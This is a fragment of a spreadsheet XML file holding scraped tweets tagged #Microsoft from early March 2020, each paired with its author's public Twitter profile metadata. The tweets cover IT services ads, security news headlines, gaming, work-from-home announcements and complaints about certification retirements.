'https://pbs.twimg.com/profile_banners/89743948/1469514435', 'profile_link_color': '009999',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</si>
  <si>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01:15:23 +0000 2020</t>
  </si>
  <si>
    <t>AlpsLogic IT Solutions has experience &amp;amp; expertise in a broad range of Microsoft technologies and languages  #USA #Canada #hustle #business #entrepreneur #motivation #remote #nomad #angular #Azure #SharePoint #Dotnet #MVC #Microsoft #Technologies https://t.co/G1kMVC7RqL</t>
  </si>
  <si>
    <t>{'id': 2154316250, 'id_str': '2154316250', 'name': 'Alps Info Corp.', 'screen_name': 'AlpsInfoCorp', 'location': 'Canada', 'description': 'Alps InfoCorporation, an Software Solutions Company with over 15 years of experience in delivering Sharepoint Application, Web Application.', 'url': 'https://t.co/GyDjths10t', 'entities': {'url': {'urls': [{'url': 'https://t.co/GyDjths10t', 'expanded_url': 'http://www.alpsinfo.ca', 'display_url': 'alpsinfo.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 42, 'friends_count': 102, 'listed_count': 3, 'created_at': 'Fri Oct 25 06:46:33 +0000 2013', 'favourites_count': 100, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 510,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'http://pbs.twimg.com/profile_images/999560777622208512/FbLFqbnk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/999560777622208512/FbLFqbnk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2154316250/1538827216',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</si>
  <si>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01:06:18 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Windows 10 Insider Build 19577 Released With New Windows Security Icon:" https://t.co/rDC8VmCBbP
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>{'id': 4750168514, 'id_str': '4750168514', 'name': 'XenTegra', 'screen_name': 'xentegra', 'location': 'Huntersville/Charlotte, NC', 'description': 'We #enable and #educate our customers on @Citrix and partners to make #apps and #data secured and accessible from anywhere.', 'url': 'https://t.co/8iWgu3u2Lz', 'entities': {'url': {'urls': [{'url': 'https://t.co/8iWgu3u2Lz', 'expanded_url': 'http://www.xentegra.com', 'display_url': 'xentegra.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 796, 'friends_count': 2316, 'listed_count': 7, 'created_at': 'Tue Jan 12 22:21:19 +0000 2016', 'favourites_count': 344, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7318,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'http://pbs.twimg.com/profile_images/927999046089719808/OTeKfrxH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/927999046089719808/OTeKfrxH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4750168514/1547235179', 'profile_link_color': '1B4079',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</si>
  <si>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01:00:35 +0000 2020</t>
  </si>
  <si>
    <t>Highly technical matter...
https://t.co/Jc116yyHEB
#blockchain #fintech #CRM #ERP #EY #Microsoft</t>
  </si>
  <si>
    <t>{'id': 89211249, 'id_str': '89211249', 'name': 'Hang Hoang', 'screen_name': 'hanghoang03', 'location': 'Vietnam', 'description': 'Business Development Manager at Lexcomm Vietnam LLC, a Vietnam-based preeminent full-service commercial law firm ðŸ‡»ðŸ‡³', 'url': 'https://t.co/aETz75xcv5', 'entities': {'url': {'urls': [{'url': 'https://t.co/aETz75xcv5', 'expanded_url': 'http://lexcommvn.com/en/transactional-experience/', 'display_url': 'lexcommvn.com/en/transactionâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 166, 'friends_count': 265, 'listed_count': 2, 'created_at': 'Wed Nov 11 15:40:19 +0000 2009', 'favourites_count': 2063, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 783,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'http://pbs.twimg.com/profile_images/1096414348489027585/n2gYKJ_g_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1096414348489027585/n2gYKJ_g_normal.png',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</si>
  <si>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01:00:18 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/Ac5lEkLqvl</t>
  </si>
  <si>
    <t>Fri Mar 06 01:00:01 +0000 2020</t>
  </si>
  <si>
    <t>Save $1,000 on a Microsoft Surface Pro 4 when you buy recertified (which you should) https://t.co/RbvAmOUKgI #Microsoft #SurfacePro https://t.co/m5bbVwrxaI</t>
  </si>
  <si>
    <t>{'id': 69557555, 'id_str': '69557555', 'name': 'digi-SOL', 'screen_name': 'digiSOLcomau', 'location': 'Melbourne, Australia', 'description': 'Digital Solutions and Designs from Concept to Completion', 'url': 'https://t.co/JC4FFyQStb', 'entities': {'url': {'urls': [{'url': 'https://t.co/JC4FFyQStb', 'expanded_url': 'http://digiSOL.com.au', 'display_url': 'digiSOL.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 17, 'friends_count': 11, 'listed_count': 0, 'created_at': 'Fri Aug 28 10:37:03 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1095,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'http://pbs.twimg.com/profile_images/385974179/logo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/385974179/logo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/69557555/1404737754', 'profile_link_color': 'FF6600',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</si>
  <si>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via #BleepingComputer Blog: "US Govt Adds Stricter Requirements for .gov Domain Registration:" https://t.co/MSpwJecf7i
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>{'id': 1166544078516969479, 'id_str': '1166544078516969479', 'name': 'Robin Systems', 'screen_name': 'RobinSystems', 'location': '', 'description': 'Latest News, IT Trends, Analytics Information and Knowledge on Big Data and AI/ML', 'url': 'https://t.co/oOfCql3Vny', 'entities': {'url': {'urls': [{'url': 'https://t.co/oOfCql3Vny', 'expanded_url': 'https://twitter.com/RobinSystems/moments', 'display_url': 'twitter.com/RobinSystems/mâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 60, 'friends_count': 0, 'listed_count': 4, 'created_at': 'Wed Aug 28 02:52:41 +0000 2019', 'favourites_count': 65, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 636, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1166544667271467013/XlW1Jeoh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1166544667271467013/XlW1Jeoh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1166544078516969479/1566960899',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</si>
  <si>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00:57:24 +0000 2020</t>
  </si>
  <si>
    <t>@NBA2K @jaytatum0 Taking care of some Weekly Challenges - this clips going out to @ItsShake4ndbake tho.  #Celtics #GoSpursGo 
#theSNIPEdiary #theHATdiary
#2K #2KCOMMUNITY #NBA2K20 #2K20 #MyTEAM #MICROSOFT #XBOX #JWengerART https://t.co/j44YL8f2T3</t>
  </si>
  <si>
    <t>Fri Mar 06 00:57:12 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Xbox Elite Wireless Controller Series 2 Edition for Xbox One ( 59 Bids ) #Microsoft #Xbox #Elite https://t.co/4McO6CPmyV  125.0$ Price . 59 Bids Count . End Time: 2020-03-08 00:51:15 PDT</t>
  </si>
  <si>
    <t>Fri Mar 06 00:56:31 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Subscriptions below #MSRP and also #NoCommittment  needed to start! Get 15-20% discount below Microsoft pricing. Visit us today at https://t.co/9qMGf3xazy to view our pricing options. Call us at (888)511-0143 . We are #ItGurusOfAtlanta #MicrosoftPartner #Office365 https://t.co/exZVNTVBaK</t>
  </si>
  <si>
    <t>Fri Mar 06 00:56:10 +0000 2020</t>
  </si>
  <si>
    <t>#apexlegends #microsoft #xbox #pc #gaming #gamer #videogames hopefully some day the gaming community will band together to boycott loot boxes and tell us who is the product designer who first came up with this system because it has turned us all into lil piggy banks.</t>
  </si>
  <si>
    <t>{'id': 1103153556251529216, 'id_str': '1103153556251529216', 'name': 'mrfoxydoodles', 'screen_name': 'mrfoxydoodles', 'location': '', 'description': 'Art &amp; Comedy. donâ€™t listen to what I say, itâ€™s mostly nonsense and empty thoughts. thatâ€™s all they are, words and thoughts. so calm your self !', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 23, 'friends_count': 17, 'listed_count': 4, 'created_at': 'Wed Mar 06 04:41:18 +0000 2019', 'favourites_count': 473, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4156, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1103153772304330752/CUveH10W_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1103153772304330752/CUveH10W_normal.jpg',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</si>
  <si>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00:54:28 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> truth
#xbox #xboxone #masterchief #halo5 #microsoft #guns #2ndamendment #america #pyrography #marijuana #maryjane #cannabis #gamerguy #gamer #gamer4life #destinythegame #samsung #videogames... https://t.co/sYc8WTARRW</t>
  </si>
  <si>
    <t>Fri Mar 06 00:54:02 +0000 2020</t>
  </si>
  <si>
    <t>For all my #Microsoft friends being introduced to #WFH over multiple days.
1. Showers arent mandatory, but keep this habit going.
2. Get up and walk around the block, its easy to just work all day long.
3. The Roomba is not your friend, I repeat the Roomba is not your friend.</t>
  </si>
  <si>
    <t>{'id': 70234339, 'id_str': '70234339', 'name': 'Alex Power[s] Platform', 'screen_name': 'notaboutthecell', 'location': 'St Louis, MO', 'description': 'I spend my days crunching numbers and my nights torturing a wife and cats with the sound of keystrokes. Opinions are my own. #MSFTEmployee', 'url': 'https://t.co/tsVRbev3W1', 'entities': {'url': {'urls': [{'url': 'https://t.co/tsVRbev3W1', 'expanded_url': 'http://www.itsnotaboutthecell.com', 'display_url': 'itsnotaboutthecell.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1096, 'friends_count': 223, 'listed_count': 36, 'created_at': 'Sun Aug 30 22:39:45 +0000 2009', 'favourites_count': 8269, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3110,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'http://pbs.twimg.com/profile_images/1122193601897861120/sEBGk1IY_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1122193601897861120/sEBGk1IY_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/70234339/1452225359',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</si>
  <si>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00:52:18 +0000 2020</t>
  </si>
  <si>
    <t>This year I'm trying to see if #Microsoft is the move for my latest venture.</t>
  </si>
  <si>
    <t>{'id': 1221111846360551428, 'id_str': '1221111846360551428', 'name': 'Justin Anderson ðŸ”¥ðŸ‰', 'screen_name': 'itsjustinandrsn', 'location': 'Atlanta, GA', 'description': 'Unapologetic &amp; Unorthodox Creative| Dominant |Story Teller| Walking Brand|Rebel| Owner of @InTheseMediaSts &amp; @UUXCreativeGrp', 'url': 'https://t.co/Y4yyiwEZ3i', 'entities': {'url': {'urls': [{'url': 'https://t.co/Y4yyiwEZ3i', 'expanded_url': 'http://imjustinanderson.com', 'display_url': 'imjustinanderson.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 75, 'friends_count': 429, 'listed_count': 0, 'created_at': 'Sat Jan 25 16:45:44 +0000 2020', 'favourites_count': 288, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 341, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1231936015901843456/zXS7yEZp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231936015901843456/zXS7yEZp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1221111846360551428/1579971375',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</si>
  <si>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00:52:08 +0000 2020</t>
  </si>
  <si>
    <t>Tell me how would you fuck me 
 #loscruzados #microsoft https://t.co/qY3Sg33yP6</t>
  </si>
  <si>
    <t>{'id': 1235666401031065600, 'id_str': '1235666401031065600', 'name': 'Kaka Gallegos', 'screen_name': 'awenphyca', 'location': 'Atlanta, USA', 'description': 'When I saw you I fell in love, and you smiled because you knew.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 18, 'listed_count': 0, 'created_at': 'Thu Mar 05 20:40:07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'http://pbs.twimg.com/profile_images/1235667324633571328/jzAu0Snx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235667324633571328/jzAu0Snx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235666401031065600/1583441118',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</si>
  <si>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00:52:01 +0000 2020</t>
  </si>
  <si>
    <t>Download this update from https://t.co/pKdceMlP64. Oh, sorry, that was #malware on a hijacked sub-domain. Oops https://t.co/A0szbgRNOu via @theregister #informedsecurity #Microsoft https://t.co/lqzEjasJSQ</t>
  </si>
  <si>
    <t>{'id': 920259727661166592, 'id_str': '920259727661166592', 'name': 'Jose Lagdameo Jr', 'screen_name': 'cyberinform', 'location': 'New Jersey, USA', 'description': 'New Jersey #Cybersecurity professional practicing and promoting "Informed Security" MSCIA, CEH, CCSP, CCSK, CISSP, CISM, CRISC #cyberthreat #iot #ai #blockchain', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2973, 'friends_count': 469, 'listed_count': 9, 'created_at': 'Tue Oct 17 12:06:31 +0000 2017', 'favourites_count': 102, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7676, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/997987025813889024/LoR12FCh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/997987025813889024/LoR12FCh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/920259727661166592/1526773954',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</si>
  <si>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00:50:27 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft tells Bay Area and Puget Sound employees to work from home if possible as coronavirus spreads
 #businessnews #coronavirus #workfromhome #microsoft  #hatman #timman @hmanawy https://t.co/z51gkpnucb</t>
  </si>
  <si>
    <t>{'id': 55807085, 'id_str': '55807085', 'name': 'Hatem Elmanawy', 'screen_name': 'hmanawy', 'location': 'Canada', 'description': 'â€œIt Ainâ€™t What You Donâ€™t Know That Gets You Into Trouble. Itâ€™s What You Know for Sure That Just Ainâ€™t Soâ€, Mark Twain', 'url': 'https://t.co/8lx4Cx8uvZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/8lx4Cx8uvZ', 'expanded_url': 'http://linkedin.com/in/hmanawy', 'display_url': 'linkedin.com/in/hmanawy', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 310, 'friends_count': 176, 'listed_count': 6, 'created_at': 'Sat Jul 11 10:45:30 +0000 2009', 'favourites_count': 921, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2350,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'http://pbs.twimg.com/profile_images/1951522635/HatemManawy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1951522635/HatemManawy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/55807085/1393519419',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</si>
  <si>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00:50:10 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "US Govt Adds Stricter Requirements for .gov Domain Registration:" https://t.co/pwDz83ywv0
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Fri Mar 06 00:50:03 +0000 2020</t>
  </si>
  <si>
    <t>Funny how things sometimes revert back to older designs. Change for change sake does not always work.
#Windows #StartMenu #LiveTiles #Microsoft
https://t.co/GWQ2PAwuYG</t>
  </si>
  <si>
    <t>{'id': 75836430, 'id_str': '75836430', 'name': 'pavliks.com', 'screen_name': 'pavliks_com', 'location': 'Ontario, Canada', 'description': 'A full Service IT company specializing in IT Support and custom built Microsoft Dynamics CRM / 365 / GP solutions. Celebrating 50 Years in Business.', 'url': 'http://t.co/u6AbHpFyXu', 'entities': {'url': {'urls': [{'url': 'http://t.co/u6AbHpFyXu', 'expanded_url': 'http://www.pavliks.com', 'display_url': 'pavliks.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 373, 'friends_count': 299, 'listed_count': 60, 'created_at': 'Sun Sep 20 17:47:31 +0000 2009', 'favourites_count': 599, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6259, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '122245', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1212743311494123521/nyVYPV7d_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212743311494123521/nyVYPV7d_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/75836430/1577975567', 'profile_link_color': '6699CC',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</si>
  <si>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Fri Mar 06 00:49:40 +0000 2020</t>
  </si>
  <si>
    <t>New to Windows 10? Check out Simply Windows videos to get up to speed 
#Microsoft account #Windows
https://t.co/hLzHVr4tcX</t>
  </si>
  <si>
    <t>Fri Mar 06 00:49:35 +0000 2020</t>
  </si>
  <si>
    <t>Windows Server 2019 - Install and Configure SMTP Server (How To Step by Step) https://t.co/9l4wVbJur6 via @YouTube #Microsoft #Windows #Server #Server2019 #SMTP #SMTPServer #IT #Tech #Technology #SystemAdmin #WindowsAdmin</t>
  </si>
  <si>
    <t>{'id': 307698053, 'id_str': '307698053', 'name': 'Remote IT Support', 'screen_name': 'OrlandoPCRepair', 'location': 'Orlando, FL', 'description': 'Free VPS Hosting\nhttps://t.co/09uXwVb3YC', 'url': 'https://t.co/44OuI9xdLG', 'entities': {'url': {'urls': [{'url': 'https://t.co/44OuI9xdLG', 'expanded_url': 'http://remoteitsupport.unaux.com', 'display_url': 'remoteitsupport.unaux.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/09uXwVb3YC', 'expanded_url': 'https://fastserversnow.duoservers.com/vps-servers/', 'display_url': 'fastserversnow.duoservers.com/vps-servers/', 'indices': [17, 40]}]}}, 'protected': False, 'followers_count': 8192, 'friends_count': 6499, 'listed_count': 15, 'created_at': 'Mon May 30 03:57:05 +0000 2011', 'favourites_count': 58, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 25062, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '002BDA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1374354658/Orlando-pc-computer-repair-service_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1374354658/Orlando-pc-computer-repair-service_normal.png', 'profile_link_color': '0A218A', 'profile_sidebar_border_color': 'FA710F', 'profile_sidebar_fill_color': 'E8FFFB', 'profile_text_color': 'B2EDED', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 00:47:15 +0000 2020</t>
  </si>
  <si>
    <t>@cheerfuldba Not impressed, after 'years' of writing #Microsoft certifications, now to be given 4 months' notice of every MCSE, MCSA, MCSD exam path retirement.  My employer doesn't work with #Azure. No value in these new role-based certifications for me.  Bad move on many levels. Goodbye MS</t>
  </si>
  <si>
    <t>{'id': 173851488, 'id_str': '173851488', 'name': 'Dean Wiseman', 'screen_name': 'WiseMade', 'location': 'Canada', 'description': 'Developer | Software Engineer | SEO Strategist | Social Media | SaaS | Azure | .Net  | Umbraco | Techie | P90Xer | Yoga | Jazz/Folk/Blues Music | Pizza Lover |', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4570, 'friends_count': 4156, 'listed_count': 583, 'created_at': 'Mon Aug 02 14:33:06 +0000 2010', 'favourites_count': 830, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 22855,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'http://pbs.twimg.com/profile_images/885319799550738433/gzHpMUc8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/885319799550738433/gzHpMUc8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/173851488/1499912407', 'profile_link_color': '485C3A', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '060A00', 'profile_text_color': '618238', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 00:43:13 +0000 2020</t>
  </si>
  <si>
    <t>Enjoying the Sea Of Thieves graphics #seaofthieves #Mixer #stream #microsoft #weeb https://t.co/r9HhNHdKwj</t>
  </si>
  <si>
    <t>{'id': 1235724495903698944, 'id_str': '1235724495903698944', 'name': 'AstroPotato', 'screen_name': 'PotatoAstro', 'location': '', 'description': 'A small Canadian based streamer streaming on Mixer\nMy Mixer | Astro_Potato12\nMy Main. | va_potato', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Fri Mar 06 00:31:19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'http://pbs.twimg.com/profile_images/1235724826469429248/v4x3y6Ni_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235724826469429248/v4x3y6Ni_normal.jpg',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</si>
  <si>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00:42:59 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft breaks #proprietarysoftware #slopware https://t.co/jrF1P6Yv9M</t>
  </si>
  <si>
    <t>Fri Mar 06 00:41:54 +0000 2020</t>
  </si>
  <si>
    <t>@CW_DTech Such a bad decision on @Microsoft part. After years of certifying with #Microsoft it may be time to say goodbye.  4 months' notice on (dozens) exam retirements. Slap in the face to those working with their technology. @MicrosoftLearn Who's going to want to continue with MS</t>
  </si>
  <si>
    <t>Fri Mar 06 00:40:28 +0000 2020</t>
  </si>
  <si>
    <t>Troubleshooting Common issues with Elastic Jobs in Azure SQL Database https://t.co/fPxmOtwA0D #microsoft #feedly</t>
  </si>
  <si>
    <t>{'id': 14492677, 'id_str': '14492677', 'name': 'Norio SASHIZAKI', 'screen_name': 'sshzk', 'location': 'ç¥žå¥ˆå·', 'description': 'Windowsã¨SC 2019ã€Linuxã‚‚ã€‚ã„ã¾ã¯ä¸»ã«S2Dã¨Windows Admin Centerã€‚è¶£å‘³ã¯ã€ é¢¨æ™¯ã€èŠ±ã€ã‚µãƒ¼ãƒ•ã‚£ãƒ³ã®å†™çœŸæ’®å½±ã€ã‚¬ãƒ³ãƒ—ãƒ©ã€‚Microsoft MVP CDM, MCSE Private Cloud, RHCSEã§ã™ã€‚@DELLEMC', 'url': 'https://t.co/6tBMbYk3Fd', 'entities': {'url': {'urls': [{'url': 'https://t.co/6tBMbYk3Fd', 'expanded_url': 'http://sshzk.blogspot.com', 'display_url': 'sshzk.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 349, 'friends_count': 542, 'listed_count': 95, 'created_at': 'Wed Apr 23 12:48:23 +0000 2008', 'favourites_count': 3990, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 20864,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'http://pbs.twimg.com/profile_images/791744254/icon12701734439128_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/791744254/icon12701734439128_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14492677/1368354211',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</si>
  <si>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Fri Mar 06 00:40:14 +0000 2020</t>
  </si>
  <si>
    <t>Human-operated ransomware attacks: A preventable disaster https://t.co/erOiQAq6IG #microsoft #feedly</t>
  </si>
  <si>
    <t>Fri Mar 06 00:40:03 +0000 2020</t>
  </si>
  <si>
    <t>When your team brings in 3 new #Microsoft certifications in one week! 
Azure Solutions Architect, #Azure Security Engineer &amp;amp; Power Platform Fundamentals https://t.co/w1QmxCd9KU</t>
  </si>
  <si>
    <t>{'id': 374017763, 'id_str': '374017763', 'name': 'iV4', 'screen_name': 'iV4inc', 'location': 'Syracuse, Rochester &amp; Buffalo, NY', 'description': 'We do technology best, so you can do business better. IT Consulting, Security, Cloud &amp; Managed Services. Top Microsoft Partner.', 'url': 'https://t.co/VKtBIBWO2L', 'entities': {'url': {'urls': [{'url': 'https://t.co/VKtBIBWO2L', 'expanded_url': 'http://iV4.com', 'display_url': 'iV4.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 318, 'friends_count': 688, 'listed_count': 24, 'created_at': 'Thu Sep 15 15:26:17 +0000 2011', 'favourites_count': 167, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2842,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'http://pbs.twimg.com/profile_images/989286906721701888/nviaPGTq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/989286906721701888/nviaPGTq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/374017763/1558703581', 'profile_link_color': '004987',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</si>
  <si>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00:40:02 +0000 2020</t>
  </si>
  <si>
    <t>#Amazon, #Microsoft and #Facebook advise employees to work from home https://t.co/3ebH7EV7Bj</t>
  </si>
  <si>
    <t>{'id': 20198802, 'id_str': '20198802', 'name': 'Aida', 'screen_name': 'Bellanieve', 'location': 'Miami USA', 'description': 'Woman in Love with Universe/Carina Nebula~I Despise Communism/Socialism~Love the Constitution of the United States of America~ #2A #MAGA #Cult45', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 14933, 'friends_count': 15017, 'listed_count': 423, 'created_at': 'Thu Feb 05 22:55:50 +0000 2009', 'favourites_count': 23882, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 228724,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'http://pbs.twimg.com/profile_images/894275274195558402/RHJ4_e5W_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/894275274195558402/RHJ4_e5W_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20198802/1398308163',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</si>
  <si>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00:39:58 +0000 2020</t>
  </si>
  <si>
    <t>IT executives prioritize Multi-Factor Authentication in 2020 https://t.co/rE40FZeXzG #microsoft #feedly</t>
  </si>
  <si>
    <t>Fri Mar 06 00:39:44 +0000 2020</t>
  </si>
  <si>
    <t>Meraki DevNet Express Rocks at CLEUR 2020 https://t.co/QlAGzKK7Ky
For more info: https://t.co/IDwCKnen3o #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #internetofthings #dell #cto https://t.co/NZgbxwFXs5</t>
  </si>
  <si>
    <t>{'id': 877546690332512256, 'id_str': '877546690332512256', 'name': 'Sigma Ridge', 'screen_name': 'sigmaridge', 'location': 'Manhattan, NY', 'description': 'Our mission: Enjoy what we do while creating value for our partners, through passion, honesty &amp; dedication. #IOT #it #digitalmarketing #business #marketing #ceo', 'url': 'https://t.co/C0RtdJJGQ0', 'entities': {'url': {'urls': [{'url': 'https://t.co/C0RtdJJGQ0', 'expanded_url': 'http://www.sigmaridge.com', 'display_url': 'sigmaridge.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1458, 'friends_count': 1353, 'listed_count': 15, 'created_at': 'Wed Jun 21 15:20:09 +0000 2017', 'favourites_count': 112, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1295,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'http://pbs.twimg.com/profile_images/1201582278482317315/W2BI2RNN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1201582278482317315/W2BI2RNN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/877546690332512256/1575314515', 'profile_link_color': '555656',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</si>
  <si>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00:36:14 +0000 2020</t>
  </si>
  <si>
    <t>This is the time when @Microsoft realizes they didnt need to start building the new buildings theyre putting on campus... #redmond #microsoft #awkward #wfm #covid19</t>
  </si>
  <si>
